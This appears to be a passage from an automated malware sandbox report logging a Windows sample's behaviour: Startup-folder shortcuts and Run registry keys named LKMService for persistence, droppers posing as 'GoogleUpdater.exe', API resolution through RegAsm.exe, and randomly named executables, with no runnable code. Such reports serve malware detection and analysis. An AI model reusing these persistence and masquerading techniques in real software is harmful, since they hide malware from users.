                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5d9c7e6222a6448f991fa9689fe1f520.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_833c30cf22984dcfb8f55594c11b4ff5.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5cb1f498f4f5487ba4ca14feb7c233b4.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_acb9d702076947e6b74d349f79874528.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_245408048cc14313a5b6e57b09a192da.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3b61ff7b15414f12abab9adf1ad4d4ca.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b933bafb63a4403e892973fe2de79f65.lnk
                            Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_f5ad86b5dd8e489690bbd1068a1566bcJump to behavior
                            Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_f5ad86b5dd8e489690bbd1068a1566bcJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_057e415b921b4c378f9896f9d0db791fJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_057e415b921b4c378f9896f9d0db791fJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_00419860
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
